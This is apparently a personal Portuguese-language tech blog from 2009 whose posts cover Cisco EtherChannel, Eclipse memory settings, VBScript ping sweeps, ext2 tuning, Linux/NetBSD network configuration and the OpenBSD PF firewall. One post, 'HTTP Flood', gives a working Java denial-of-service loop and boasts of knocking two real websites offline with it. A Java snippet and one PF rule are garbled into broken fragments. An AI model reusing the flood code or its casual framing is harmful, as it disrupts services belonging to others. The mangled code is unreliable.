Os switchs da cisco ( e outros ) rodam um algoritimo chamado Spanning-tree para evitar que um pacote entre em uma interface e seja encaminhada para outra e fique em loop dentro da rede causando aumento de tráfego e lentidão. Sendo assim, o protocolo bloqueia uma das portas que estão interligadas fazendo que exista apenas um caminho entre os switchs. Se o caminho que está em uso falhar ( se der problema em uma das interfaces ) o spanning-tree é executado novamente e encontra a outra porta que estava antes bloqueada, e a libera ( esse processo leva 50 segundos por padrão ) .

O Etherchannel é a solução que permiter que nós unamos dois ou mais links que estão ligados ao mesmo destino transformando esses links em apenas um. Ou seja, portas 1 e 2 do Switch 1 estão fisicamente ligadas às portas 1 e 2 do Switch 2. Com o etherchannel configurado, ambos os switchs verão da seguinte maneira: Porta port-channel 1 do Sw 1 está ligada à porta port-channel 2 do Sw 2. Traduzindo: É criado uma interface virtual e todas as interfaces reais que estão agrupadas nesse canal é usado para se comunicar com o próximo switch.

Isso é usado para aumentar a largura de banda do tronco de comunicação entre os switchs e evitar que, quando uma interface ficar inoperante, o spanning-tree seja executado novamente ( uma demora de 50 segundos até tudo voltar ao normal ), isso acontece por que quando uma interface para de funcoionar, ainda existem outras no mesmo tronco, e apenas a largura de banda é afetada e não o caminho para o outro switch.

Muito bem, vamos ver agora como configurar um canal (channel) de interfaces Ethernet (ether):

switch1>enable
switch1#configure terminal
switch1(config)# interface range Giga 1/1 - 2
switch1(config-if-range)#channel-group 1 mode on
switch1(config-if-range)#end
switch1#wr

A configuração acima refere-se ao seguinte:
1 - entramos em modo privilegiado;
2 - entramos no modo de configuração global
3 - acessamos simultâneamente as interfaces giga 1/1 e giga 1/2 ( por isso o uso do comando range)
4 - habilitamos ambas as interfaces para participar no grupo do canal 1
5 - voltamos ao modo privilegiado
6 - salvamos a configuração

Agora basta repetir a mesma configuração no próximo switch:

switch2>enable
switch2#configure terminal
switch2(config)# interface range Giga 1/1 - 2
switch2(config-if-range)#channel-group 1 mode on
switch2(config-if-range)#end
switch2#wr

Então você vai perceber que o spanning-tree não vai mais bloquear uma de suas portas, isso se dá porque ambas as portas agora são uma porta só, a port-channel 1!

Um forte abraço a todos,

Eclipse - Falta de espaço em memória

2009-12-07T15:34:00.005-03:00

Comecei a construir um projeto no eclipse usando o Java + Flex (a coisa mais linda - depois de mim :P), mas o projeto chegou em um tamanho que parecia impossível de ser executado. Quando eu pedia pra gerar uma tela o eclipse travava com o erro de falta de memória. Não era possível compilar o programa, iniciar o servidor tomcat, exportar o projeto... Em fim até pensar fazia o eclipse travar.

O que me salvou foi adicionar a seguite linha ao destino do atalho do Eclipse:

-vmargs -Xmx1024m -XX:PermSize=128m -XX:MaxPermSize=256m

Adicionei isso à chamada do executável do Eclipse e pronto, voltei a executar o meu projeto tranquilamente.

Abraços

HTTP Flood - Eu não imaginava que era tão simples

2009-11-24T16:47:00.004-03:00

Ontem a noite estava tão produtiva que eu fiz isso e testei em 3 sites, dois deles ficaram indisponíveis enquanto o programa estava em execução:

-------------- dos.java ---------------

public class dos implements Runnable {

// configuração do alvo do ataque!
private String alvo = "192.168.0.11"; // coloque o host alvo aqui
int porta = 80;

public void run() {
for (;;){
try {
Socket atacante1 = new Socket(alvo, porta);
Socket atacante2 = new Socket(alvo, porta);
} catch (Exception e){

}
}
}
}

--------------------- fim dos.java ---------------------

--------------------- main.java ---------------------

public class main {
public static void main(String args[]){
dos atak = new dos();
Thread t = new Thread(atak);
t.start();
}
}

--------------------- fim main.java ---------------------

É simples, mas dá pra treinar um pouco de programação! :)

Canal no youtube

2009-11-11T23:54:00.002-03:00

Pessoal,

Para melhor visualização dos vídeos eu criei um canal no YOUTUBE e coloqei os mesmo lá. Agora vou separar as coisas assim: vídeos -> Youtube; Textos -> Blog.

O canal no youtube é: http://www.youtube.com/user/alanMcordeiro

Forte abraço,

ALIAS

2009-11-11T00:46:00.003-03:00

Espero que esse vídeo esteja melhor que os demais. Nele eu explico o comando alias do Linux.

Editor de texto vi

2009-11-10T23:46:00.003-03:00

O editor de texto VI é o mais importante editor de texto de linha de comando para o Linux. Por que??? Simples: Por que é o que vem em todos os sistemas por padrão e é o que é cobrado na prova de certificação. :)

Estou iniciando uma pequena série de vídeos e vamos começar com o pé direito vendo como usar o VI.

Forte abraço,

VBScript - Lista de IPs ATIVOS

2009-11-10T23:13:00.002-03:00

Esse script é uma sequência para o script anterior. Ele usa o arquivo criado pelo script 1 com a lista de IPs de uma determinada rede, e testa cada um para saber se ele está ativo na rede ou não.

Então ele cria um arquivo dentro da unodade c:\ chamado IpsAtivos.txt contendo APENAS os IPs que estão ativos na rede.

SCRIPT:

dim IP 'recebe o IP
dim Resultado 'Recebe o resultado do ping
dim i 'usado nos contadores
dim arquivo1 'Lista de IPs a verificar
dim arquivo2 'Lista de IPs Ativos

arquivo1 = "C:\ListaIp.txt"
arquivo2 = "C:\IpsAtivos.txt"

' Abrindo o arquivo que tem a lista de IPs
Set objArq1 = CreateObject("Scripting.FileSystemObject")
Set EArq1 = objArq1.OpenTextFile(arquivo1, 1, True)

' Criando arquivo que receberá a lista de IPs ativos
Set objArq2 = CreateObject("Scripting.FileSystemObject")
Set EArq2 = objArq2.OpenTextFile(arquivo2, 8, True)

Do Until EArq1.AtEndOfStream
IP = Earq1.ReadLine

Set winShell = WScript.CreateObject("WScript.Shell")
Set WshExec = winShell.Exec("ping -n 3 -w 2000 " & IP)
Resultado = LCase(WshExec.StdOut.ReadAll)
If InStr(Resultado, "reply from") Then
Earq2.WriteLine(IP)
Elseif InStr(Resultado, "resposta de") Then
Earq2.WriteLine(IP)
End if

Loop

VBScript - Lista de IPs

2009-11-10T23:09:00.004-03:00

Esse é um dos scripts que fiz para ajudar uma colega num exercício da faculdade. Ele lista dodos os IPs de uma determinada rede. O script lhe pede o IP (ex.: 192.168.0.0) e a máscara (ex.: 24) é ele usa essa notação para máscara - preste atenção nisso!

Logo após ele cria dentro da unidade c:\ um arquivo chamado ListaIp.txt, e dentro dele a lista de IPs que estão dentro dessa rede.

PS.: Esse programa ainda não faz VLSM.

SCRIPT:

dim IP 'recebe o IP
dim i 'usado nos contadores
dim j 'usado nos contadores
dim l 'usado nos contadores
dim tam 'tamanho da string do IP
dim OC1 'primeiro octeto
dim OC2 'Segundo octeto
dim OC3 'terceiro octeto
dim OC4 'quarto octeto
dim MASK 'máscara
dim arquivo 'caminho para o arquivo final

arquivo = "C:\ListaIp.txt"

' Criando o arquivo a receber a lista de IPs
Set objArq = CreateObject("Scripting.FileSystemObject")
Set EArq = objArq.OpenTextFile(arquivo, 8, True)

' Recebendo o endereço IP do usuário
IP = inputbox("Digite o endereço IP a scannear: ")

' Pegando o numero de caracteres do IP (vai ser usado
' para separar os octetos)
tam = Len(IP)

' Separando os octetos
num = InStr(IP, ".")
OC1 = Left(IP, num-1)
IP = Right(IP, tam-num)

tam = Len(IP)

num = InStr(IP, ".")
OC2 = Left(IP, num-1)
IP = Right(IP, tam-num)

tam = Len(IP)

num = InStr(IP, ".")
OC3 = Left(IP, num-1)
OC4 = Right(IP, tam-num)
' Octetos separados com sucesso

' Recebendo a máscara de rede do usuário
MASK = inputbox("Digite a máscara do endereço IP: ")

' Testando a máscara, gerando os IPs e Escrevendo-os em arquivo
If MASK = 24 then
for i=0 to 255
IP = OC1 & "." & OC2 & "." & OC3 & "."
OC4 = i
IP = IP & OC4
EArq.WriteLine(IP)
Next
Earq.Close
Elseif MASK = 16 then
for j=0 to 255
IP = OC1 & "." & OC2 & "."
OC3 = j
for i=0 to 255
IP = OC1 & "." & OC2 & "." & OC3 & "."
OC4 = i
IP = IP & OC4
EArq.WriteLine(IP)
Next
Next
Elseif MASK = 8 then
for l=0 to 255
IP = OC1 & "."
OC2 = l
for j=0 to 255
IP = OC1 & "." & OC2 & "."
OC3 = j
for i=0 to 255
IP = OC1 & "." & OC2 & "." & OC3 & "."
OC4 = i
IP = IP & OC4
EArq.WriteLine(IP)
Next
Next
Next
Else
msgbox("Máscara não suportada")
End if

}

Reaproveitando comandos

2009-09-16T17:09:00.004-03:00

No dia-a-dia nós nos perdemos numa infinidade de comandos no shell de nossos sistemas Unix-like. Existe algumas maneiras de reaproveitar os comandos anteriormente digitados.

O comando mais conhecido é o "history". Podemos usar o comando puro, e ele nos mostra a lista de ultimos comandos digitaos, ou então o comando seguido por um número e então ele nos retorna apenas os ultimos "n" comandos digitados:

[root@localhost ~]# history 3
1175 man -a rdev
1176 man -a rdev
1177 history 3

A outra manheira bastante elegante é o comando "fc". A opção -l desse comando lista para nós os ultimos comandos a partir do comando definido para procura:

[root@localhost ~]# fc -l man
1176 man -a rdev
1177 history 3
1178 fc -l vg
1179 fc -l mnt
1180 fc -l pv

Foi mostrado o ultimo comando man que usei e todos os comandos que vieram após ele. Agora caso queira usar um dos comandos já digitados, basta olhar o número que aparece ao lado esquerdo do comando e usá-lo com o "!" assim:

[root@localhost ~]#!1176

Digitem menos, e façam mais! Grande abraço

Instalando programas no NetBSD

2009-09-14T14:20:00.008-03:00

O Som é meio pesadinho, mas foi pra animar a tarde.

Neste vídeo eu mostro como instalar o Bash2 no NetBSD; Com isso podemos usar a techa
TAB para completar comandos e nomes de arquivos. Também podemos usar o CTRL + R
coisas que não são possíveis no shell padrão do NetBSD (o /bin/sh).

Espero que tirem proveito.

Qualquer sugestão, estou ansioso para lê-la. Até mais!

Ext2 e Ext3 Avançado

2009-08-21T11:07:00.004-03:00

Você sabia que, ao criar um sistema de arquivos do tipo ext2 ou ext3, o sistema automaticamente reserva 5% do tamanho total do disco para ser usado apenas pelo usuário root?

Pois é, sendo assim, quando você lotar 95% do seu disco nenhum usuário conseguirá logar, apenas o root. Isso se dá por que ao logar alguns arquivos temporários são criados, e já que só está disponível os 5% do usuário root, apenas ele consegue acessar o sistema.

Isso é uma medida de segurança usado para garantir que quando o disco estiver com 100% de uso, na verdade ele esteja com 5% disponível para o usuário administrador poder entrar no sistema e fazer as alterações necessárias.

Essas configurações podem ser alteradas usando o comando tune2fs, ele é usado para "TUNAR", ou seja, fazer configurações finas no seu sistema de arquivos.

A opção -l do tune2fs nos permite ver as configurações atuais. Veja um exemplo:

[root@localhost ~]# tune2fs -l /dev/sda1
tune2fs 1.39 (29-May-2006)
Filesystem volume name: /
Last mounted on:
Filesystem UUID: b71b30fb-b4e0-4a46-9bb7-97c907872ce1
Filesystem magic number: 0xEF53
Filesystem revision #: 1 (dynamic)
Filesystem features: has_journal ext_attr resize_inode dir_index filetype needs_recovery sparse_super large_file
Default mount options: user_xattr acl
Filesystem state: clean
Errors behavior: Continue
Filesystem OS type: Linux
Inode count: 2072576
Block count: 2072377
Reserved block count: 103618
Free blocks: 1325167
Free inodes: 1944687
First block: 0
Block size: 4096
Fragment size: 4096
Reserved GDT blocks: 505
Blocks per group: 32768
Fragments per group: 32768
Inodes per group: 32384
Inode blocks per group: 1012
Filesystem created: Tue Jun 9 12:22:37 2009
Last mount time: Sat Aug 15 18:48:47 2009
Last write time: Sat Aug 15 18:48:47 2009
Mount count: 17
Maximum mount count: -1
Last checked: Tue Jun 9 12:22:37 2009
Check interval: 0 ()
Reserved blocks uid: 0 (user root)
Reserved blocks gid: 0 (group root)
First inode: 11
Inode size: 128
Journal inode: 8
Default directory hash: tea
Directory Hash Seed: 16eb3650-1638-4237-a476-af0473a77385
Journal backup: inode blocks

Observe nas partes em negrito, temos o número de blocos reservados, o tamanho de cada bloco e finalmente qual usuário terá a permissão de usar os blocos reservados.

Se você tiver interesse em colocar outro usuário para poder usar os blocos reservados, use a opção -u do mesmo comando. asism:

tune2fs -u alan /dev/sda1

Para alterar o tamanho de blocos reservado use a opção -m da seguinte maneira:

tune2fs -m10 /dev/sda1

Observe o número 10 logo após o -m, ele indica 10% do disco. Para você reduzir a porcentagem ao mínimo possível use 0% que automaticamente ele reajustará para 1% :). 1% é o mínimo, pois
esse mecanismo de segurança é REALMENTE necessário.

Abraços,

Upload de arquivos grandes

2009-07-16T16:02:00.002-03:00

Faça upload e compartilhe arquivos grandes:

http://senduit.com/

Gosto dessa música

2009-07-15T13:48:00.000-03:00

Gosto dessa música, olhe a letra também! :)

Música:

Letra:
http://letras.terra.com.br/james-blunt/1086279/

Eu amo programar :P

2009-07-14T22:27:00.001-03:00

Depois eu explico isso:

import java.util.Calendar;

public class Brutos {
public static void main(String[] args) {
Calendar hora = Calendar.getInstance();
long milisec = hora.getTimeInMillis();
char[] digits = getDigitos(milisec);
String make = "";
int pos=0, resultado=0;

System.out.println("HORA em Milisegundos: " + milisec);
System.out.println(" ");
try {
} catch (Exception e){
e.printStackTrace();
}

for (int max = 0; max < make =" make" resultado =" Integer.parseInt(make);" caracteres =" String.valueOf(numero).toCharArray();" digitos =" new" cont =" 0;" posicao =" (caracteres.length">

MySQL Connector - JAVA

2009-07-05T23:01:00.002-03:00

Bem,

O blog também é um lugar para eu guardar as coisas que me serão úteis no futuro. Esse problema eu resolvi uma vez mas não anotei em lugar algum, por isso quando precisei tive que bater a cabeça novamente.

Onde colocar o conector do MySQL para o JAVA? here:

C:\Arquivos de programas\Java\jdk1.6.0_14\jre\lib\ext

Assim o Class.forName("com.mysql.jdbc.Driver"); vai encontrar o MySQL Connector.

Sabendo disso é possível resolver o problema tanto no linux quanto no windows. Se existe um método melhor do que copiar o conector nessa pasta, vou descobrir depois. O que importa é que pra mim hoje funciona assim.

O sistema Operacional NetBSD

2009-06-26T14:22:00.002-03:00

O meu sistema operacional predileto. Aconselho um estudo do mesmo, caso esteja interessado em montar bons servidores de rede, firewalls e afins.

Se você precisa de uma referência inicial até conseguir Andar com as próprias pernas, aí segue um excelente material: http://www.mclink.it/personal/MG2508/nbsdbra/netbsd.html . Ainda vale citar que estou à disposição para ajudá-los.

O NetBSD possui um grande apoio da comunidade e uma vasta documentação internet a fora. Vale a pena coferir.

Configuração de rede no Linux/NetBSD

2009-06-26T14:19:00.002-03:00

Vamos abordar os arquivos/comandos do Linux usados para manipular as configurações de rede. Logicamente para configurar uma rede é necessário ter o conhecimento não só dos comandos, mas também de redes em si, independente de sistema operacional.

Este texto não irá ensinar o conceito de rede, portanto faz-se necessário o conhecimento desse assunto a fim de entender bem o texto a seguir.

Um dos passos necessários para a configuração de rede, se não o principal passo, é a configuração de um endereço para uma interface (placa de rede). Não só no Linux, mas na maioria dos sistemas baseados no UNIX o comando usado para tal é o "ifconfig".

SINTAXE:
ifconfig "interface" "IP" netmask "mascara"

Exemplo:
ifconfig eth0 192.168.0.32 netmask 255.255.255.0

No exemplo acima foi configurado o endereço IP 192.168.0.32 com a mascara classe C para a Interface "eth0". Vale citar que se ao configurar o endereço na interface nenhuma mascara for definida, o sistema adotará a mascara padrão para a classe do IP. Sendo assim, o exemplo a seguir teria o mesmo resultado que o exemplo acima:

ifconfig eth0 192.168.0.32

Preste bastante atenção em qual interface (eth0, eth1, eth2 ...) você está configurando o endereçamento, pois caso você tenha mais de uma placa de rede em seu computador, mais de uma interface estará disponível.

Para adicionar uma saída padrão (gateway) para redes desconhecidas, usamos o comando "route".

Exemplo:

route add default gw 192.168.0.254

No comando acima adicionamos a saída padrão (default gw) pelo computador de endereço 192.168.0.254. Mas isso não basta para uma configuração de rede. Ainda precisamos configurar o DNS, ou seja, quem vai resolver os nomes dos sites pra a agente. Isso é feito unicamente em um arquivo chamado /etc/resolv.conf - Como o próprio nome do arquivo sugere, quem irá resolver os nomes para nós.

Exemplo:

echo "nameserver 192.168.0.254" > /etc/resolv.conf

No exemplo acima foi inserido no arquivo de lista de resolvedores de nomes o endereço do nosso servidor DNS. É, obseerve que eu falei "lista de resolvedores", pois dentro desses arquivo podemos colocar mais de um servidor DNS.

A configuração de endereçamento IP por meio dos comandos "ipconfig" e "route" têm validade apenas em tempo de execução. O que significa que se o computador for reiniciado, as suas configurações não serão mais válidas, e o computador voltará a estar sem endereço IP e sem rota para saída padrão. Para que a configuração tenha efeito ainda que o computador reinicie, as configurações devem estar em um arquivo apropriado. Toda vez que o sistema iniciar ele lerá esse arquivo e colocar em execução as configurações de rede que estiverem dentro dele.

A manipulação das configurações de rede por meio de arquivos variam a dapender da distribuição. Vamos citar os exemplos dos sistemas baseados no RedHat e no NetBSD.

Em sistemas baseados no RedHat (Fedora, CentOS, Clarkconnect ...) o arquvivo para configuração de endereçamento é o /etc/sysconfig/network-scripts/ifcfg-eth0 (eth0 é a interface, e pode alterar de acordo com a interface que você quer configurar).

Abaixo segue um exemplo comentado do arquivo:

DEVICE=eth0 # nome da interface

ONBOOT=yes # Habilitado ao iniciar o sistema

HWADDR=00:0c:29:77:ec:06 # Endereço MAC

IPADDR=192.168.0.254 # Endereço IP

NETMASK=255.255.255.0 # Mascara de rede

GATEWAY = 192.168.0.254 # Saida padrão

Em um sistema baseado no RedHat que tenha essa configuração, mesmo que o computador reinicie, as configurações de rede permanecerão. Mas caso você deseje configurar para pegar endereçamento via DHCP, substitua as entradas que definem o endereçamento por um simples:

BOOTPROTO=dhcp

Agora para configurar o endereçamento num sistema NetBSD você vai precisar configurar mais arquivos. Por exemplo, para definir o endereço CRIE um arquivo:

/etc/ifconfig.rtk0

o arquivo não existe, você terá de criá-lo. E o rtk0 depois do ponto é o nome da interface, se o nome for diferente, substitua por um válido. Lá dentro insira:

inet 192.168.0.32 netmask 255.255.255.0

Para configurar o gateway (saída padrão) você terá de criar um arquivo chamado:

/etc/mygate

Neste arquivo basta adicionar o endereço IP do gateway, mais nada:

192.168.0.254

E a configuração de DNS fica no mesmo lugar que no Linux: /etc/resolv.conf

Bem, se você leu até aqui é bem provavel que tenha aprendido algo, bem diferente de se você apenas foi olhando os comando e digitando, tentando tudo pra ver se funciona. Espero ter ajudado no conhecimento de manipulação da configuração de rede em ambiente unix.

Até a próxima

OpenBSD - PacketFilter (PF)

2009-06-26T14:13:00.001-03:00

O texto que segue foi escrito por mim para uma apresentação do Packet Filter (O Filtro de pacotes do OpenBSD). Filtro de pacotes é mais comumente conhecido como: "Firewall".

PACKET FILTER

No dia 29 de Maio de 2001 foi descoberto que a licença do IPFilter (o filtro de pacotes padrão no openBSD até então), não era compatível com a licença do BSD, por isso o IPFilter foi imediatamente retirado da arvore do OpenBSD. Assim por algumas semanas o OpenBSD ficou sem um filtro de pacotes. Até que em 24 de Junho de 2001 foi lançado uma versão do PF sem muitas funcionalidades.

Na versão 3.1 do OpenBSD saiu a versão mais completa do PF. Nessa versão todas as funcionalidades básicas de um gateway/firewall foram satisfeitas: NAT, PAT, Redirecionamento .... Com a maturidade do PF, outros sistemas da família BSD também o adotaram: NetBSD, FreeBSD e DragonflyBSD.

É possível habilitar e desabilitar o PF em tempo de execução com os seguintes comandos respectivamente:

pfctl –e

pfctl –d

Ou habilitar o PF para iniciar junto com o sistema operacional, adicionando ou alterando as seguintes entradas no arquivo: /etc/rc.conf

pf=YES

pf_rules=”/etc/pf.conf”

Se o PF for habilitado em tempo de execução, será necessário carregar as regras de firewall para a execução, pois isso não é feito automaticamente quando o firewall é habilitado. É possível carregar as regras com a seguinte linha de comando:

pfctl –f /etc/pf.conf

Caso seja necessário descarregar as regras que estão em execução use o comando:

pfctl –F rules

pfctl –F nat

As regras acima descarregam (Flush) as regras de filtro e NAT respectivamente. Quando as regras de filtro forem descarregadas o PF passa a ter a regras “pass all” novamente, deixando passar todo o tráfego de entrada e saída.

O PF aceita múltiplas opções em união. Sendo assim para habilitar e carregar o firewall e as regras, poderia se digitar uma única linha de comando:

pfctl –ef /etc/pf.conf

Para usar o PF no FreeBSD é necessário uns cuidados extras. Por exemplo algumas opções específicas para cada versão do freeBSD é necessário, por isso é importante que, antes de se configurar o PF no FreeBSD, o FreeBSD handbook seja consultado. Nesse sistema, o PF funcina como um módulo aparte, isso faz necessário que ele seja carregado manualmente.

Para carregá-lo em tempo de execução:

kldload pf

Ou então, para executá-lo junto com a inicialização do sistema operacional, insira ou altere no arquivo /etc/rc.conf a seguinte entrada:

pf_enable=”YES”

Para usar o Pf no NetBSD é necessário compilar o kernel com suporte ao mesmo. Isso é feito habilitando a opção:

pseudo-device pf

Habilitar as seguintes opções em /etc/rc.conf:

lkm=”YES”

pf=YES

Ou em tempo de execução execute os seguintes comandos:

modload /usr/lkm/pf.o

pfctl –e

Levando em consideração que o Firewall vai trabalhar como gateway, é importante que ele seja capaz de fazer a comutação do pacote (enviar o pacote de uma interface para a outra). Isso é habilitado no arquivo /etc/sysctl.conf adicionando ou alterando a seguinte linha:

net.inet.ip.forwarding=1

Uma regra básica permite que tudo saia pelo firewall mas bloqueia as entradas:

block in all

pass in from $interface_interna:network

pass out all

Para os pacotes poderem voltar em resposta às requisições feitas internamente, o PF implicitamente permite que todo pacote que volte (entre pelo firewall) tendo sido anteriormente requisitado seja aceito.

É característica do PF ler as regras de firewall de cima pra baixo, e mesmo que uma regra se aplique a um determinado pacote, o firewall continuará comparando o mesmo pacote com as demais regras até chegar ao final da lista. Assim se existir outra regra que se aplique a aquele pacote, a regra será sobreposta. Para forçar que a regra seja aplicada ao pacote e não prossiga comparando com as demais regras usa-se a opção “quick” nas regras.

É possível criar variáveis dentro do arquivo de configuração do PF, essas variáveis são mais conhecidas como “macros”, uma macro pode contar um valor únicos ou múltiplos valores. Quando se atribui múltiplos valores a uma macro dá-se o nome de “lista”.

O PF ainda reconhece o número da porta de um determinado serviço pelo próprio nome do protocolo de camada 7, por exemplo: ao nome “HTTP” é atribuído o valor “80”, para “HTTPS” o valor “443” e assim por diante.

A sintaxe vic0:network (onde vic0 é o nome da placa de rede) se refere ao endereço de rede que se encontra configurado na placa vic0. E a sintaxe (vic0) se refere a endereço IP configurado na placa vic0.

Conexões FTP representam desafios maiores para o administrador do firewall, pois em todos os sentidos o FTP não é confiável. A autenticação é feita em texto claro e após a autenticação, a porta de transmissão de dados é negociada e então a transferência acontece por aquela porta. Dessa maneira o firewall não tem como adivinhar que aquela porta onde a transferência está tentando ser feita é referente a uma conexão já existente, sendo assim, a conexão é negada.

Para lidar com essa conexão problemática, é utilizado um aplicativo à parte do PF chamado Proxy-ftp, ele se encarrega de ligar as portas às conexões, e o papel do PF é apenas redirecionar as conexões FTP para o Proxy-ftp tratar. Isso é feito de uma maneira simples (com ancoras).

Geralmente é da vontade do administrador da rede liberar a requisição de pings feitos a partir de dentro da rede, mas não permitir que alguém de fora da rede o faça. Para isso é importante conhecer as características do ping. Ele usa i protocolo ICMP, e para o ping em específico podemos ter os seguintes tipos de icmp: echo-request e echo-reply. O echo-request é a requisição do ping, e echo-reply é a resposta à requisição. Então queremos permitir apenas a saída de requisições.

Conceitualmente muitos acreditam que liberando o ICMP echo-request o traceroute também funcionará, mas ele usa o protocolo UDP e não o ICMP (apenas a Microsoft implementou o tracert sobre o ICMP), as portas que o traceroute usa para fazer as requisições estão na faixa entre 33433 e 33626. Desta maneira, para liberar também o traceroute é necessio a seguinte regra:

pass out on $ext_if inet proto udp from any to any port 33433> $webpool round-robin \ stick-address

Ainda com o round-robin, temos o problema referente à indisponibilidade de um dos servidores do pool. Caso um servidor fique indisponível algumas requisições ainda serão direcionadas para ele, causando desconforto para os clientes. Para solucionar o problema usa-se um aplicativo à parte ancorado ao PF (assim como o FTP-proxy), esse aplicativo é o “hoststated”. Para o hoststated trabalhar com o PF obrigatoriamente o pool de servidores devem estar numa tabela e não numa lista em macro. Explorar o “hoststated” está fora do escopo da apresentação.

O PF pode agir, em alguns aspectos, como um IPS (Intrusion Prevention System). Em que sentido? Regras podem ser definidas e, caso alguém não cumpra a regra, entra numa tabela com ips bloqueados. Por exemplo, se configuramos o acesso remoto via SSH para a rede externa (internet) não raro haverá uma seqüência de tentativas de acesso remoto por força bruta. Podemos bloquear essas tentativas com as seguintes entradas numa regra:

max-src-conn – Número máximo de conexões a partir de um único host

max-src-conn-rate – Número máximo de requisições de conexão, por um determinado número de segundos, vindos do mesmo host.

overload – Em qual tabela jogar esse endereço de host caso ele desobedeça essas requisitos.

flush global – Derruba qualquer outra conexão vinda daquele host

É importante que a tabela pra onde o “overload” estará jogando o endereço IP do host possua uma regra de bloqueio, exemplo:

block quick from

O problema com essa solução é que não existe um mecanismo interno retirando os endereços de dentro dessa tabela. Desta maneira a tabela irá crescer até não haver mais espaço em memória, além de que se esse for um endereço dinâmico, um outro host poderá pegar esse endereço e ficar sem acesso à nossa rede por esse motivo. Para limpar os endereçamentos em um determinado tempo de dentro da tabela, é necessário executar a seguinte linha de comando:

pfctl -t table –T expire 86400

Esta linha eliminará de dentro da tabela “table” todos os endereços que estejam lá há mais de 86,400 segundos (24 horas). Como isso deve ser executado manualmente, sugere-se que seja agendado uma tarefa no crontab para que este comando seja executado periodicamente.

O PF vem com algumas opções para alguns ataquem específicos, algumas delas são:

Scrub – proteção contra ataque de pacotes mau formados (tratando a fragmentação de pacotes)

Antispoof – proteção contra ataques externos com o endereçamento da rede interna

Set block-policy – Configuração da política padrão

Set skip – Define uma interface de rede na qual as regras em geral não se aplicam

Revista Espirito Livre

2009-06-26T14:09:00.001-03:00

Excelente Revista que está chegando com todo Gás.
Uma revista online com assuntos diversos referentes a software livre. Inovando com assuntos jamais explorados em outras revistas online.

Acessem esta revista online e tenha acesso às suas edições em: http://www.revista.espiritolivre.org/

Virtualizando o IOS

2009-06-26T14:03:00.001-03:00

Você tem interesse em estudar para tirar a certificação CCNA, CCNP ou CCSP da CISCO? Ou apenas, tem vontade de conhecer, saber configurar, roteadores e firewalls da CISCO?

Se a resposta a pelo menos uma das perguntas acima for positiva, então você deve estar usando algum dos emuladores de equipamentos cisco existente no mercado (BOSON, PacketTrace...). Se ainda não está usando nenhum, melhor ainda, você não vai precisar migrar de ferramenta.

Conheça o:

Isso é uma propaganda???? É, é uma propaganda, e eu não estou ganhando nada com isso >:)

Diferente dos emuladores de equipamentos cisco no mercado, o dynamips não "emula" os equipamentos, ele VIRTUALIZA os sistemas operacionais dos equipamentos da cisco. O sistema operacional usado nos roteadores cisco é o IOS, e assim como com o vmware você pode virtualizar sistemas operacionais em seu computador (caso possua uma iso do sistema), com o GNS3/Dynamips você poderá fazer o mesmo para o IOS.

Qual a diferença entre o GNS3 e o BOSON ou outros emuladores? A diferença é que no caso do GNS3 você estará usando o sistema operacional real desenvolvido pela cisco, enquanto nos emuladores você só poderá usar os comandos que o desenvolvedor do emulador quis colocar no programa dele. Ou seja, você está interagindo com uma aplicação criada por terceiros, e não com o software real da cisco.

Qual o problema em usar um emulador? Simples: limitações. Os emuladores LÓGICO, não possuem todos os comandos que um IOS possuem, e se você virtualizá-lo usando um IOS real você terá todos os comandos. Ainda os emuladores possuem limitações de, por exemplo, quantidade de ACLs que você pode criar. Já com um IOS real você tem apenas as limitações da versçao do IOS que você estiver usando. E isso aconteceria da mesma maneira no mundo real.

Em fim, o GNS3 é uma excelente escolha para os estudantes e profissionais que querem se aprofundar nas tecnologias da cisco e/ou simular ambientes reais.

Boa Leitura

2009-06-26T14:02:00.001-03:00

Se você é do tipo que gosta de baixar livros da internet (livros técnicos), então vai se fartar nesse site:

http://www.onlinecomputerbooks.com/

Instalando Programas no NetBSD – pkgsrc

2009-06-12T01:55:00.003-03:00

Vamos ver como instalar programas no NetBSD. Para tal espera-se que o seu NetBSD já esteja devidamente instalado. Caso ainda não o tenha instalado e precise de um guia para a instalação do mesmo, use o artigo que eu escrevi na edição 3 da revista espirito livre. Faça o download da revista AQUI.
Uma vez que o seu sistema esteja instalado, certifique-se de que ele tenha conexão com a Internet:

# ping insetoverde.wordpress.com

PING lb.wordpress.com (76.74.254.123): 56 data bytes

64 bytes from 76.74.254.123: icmp_seq=0 ttl=53 time=154.486 ms

64 bytes from 76.74.254.123: icmp_seq=1 ttl=52 time=233.096 ms

^C

----lb.wordpress.com PING Statistics----

2 packets transmitted, 2 packets received, 0.0% packet loss

round-trip min/avg/max/stddev = 154.486/193.791/233.096/55.586 ms

Caso não tenha conexão use o comando “dhclient” para obter um IP por DHCP e teste novamente a conexão com o exemplo de PING demonstrado cima.

Uma vez que a conexão com a Internet esteja configurada adequadamente, já estamos prontos para instalar programas no NetBSD. Vamos agora baixar um pacote que contém a coleção de programas disponíveis para o NetBSD – o pkgsrc.tar.gz.

Digite o seguinte comando:

# ftp ftp://ftp.netbsd.org/pub/pkgsrc/current/pkgsrc.tar.gz

Aguarde até que o download tenha terminado e…

# ls

.cshrc .logout .shrc
.login .profile pkgsrc.tar.gz

Observe que o pacote está agora em nosso computador. Vamos movê-lo para um local apropriado e descompactá-lo a fim de que possamos verificar os pacotes disponíveis, escolher um deles, e instalá-lo:

# mv ./pkgsrc.tar.gz /usr/
# cd /usr/
# tar -zxvf ./pkgsrc.tar.gz

O comando “tar” irá descompactá-lo dentro de “/usr” criando um diretório chamado “pkgsrc“. Destro dele estarão os profgramas portados ou desenvolvidos para o NetBSD.

INSTALANDO UM PROGRAMA

Vamos escolher um programa para instalar. Um programa que costumo instalar antes de qualquer um outro é o “pkgfind” acho ele super útil, por que ele me ajuda a encontrar outros programas dentro dos diretórios do pkgsrc (são muitos diretórios, às vezes não sei onde está o programa que quero instalar). Por isso, vamos instalá-lo e ver a sua utilização básica.

# cd /usr/pkgsrc/pkgtools/pkgfind/

Agora dentro do diretório do pkgfind, precisamos apenas digitar: make install. Feito isso, pronto!!! Temos o pkgfind instalado :) Vamos aprender a usar ele agora. Se quisermos instalar o programa “nmap”… onde ele está para nós podermos entrar em seu diretório e digitar o “make install”??? Vamos usar o pkgfind para descobrir:

# pkgfind nmap

net/nmap: Network/port scanner with OS detection

net/p5-Nmap-Parser: Parse nmap scan data with perl

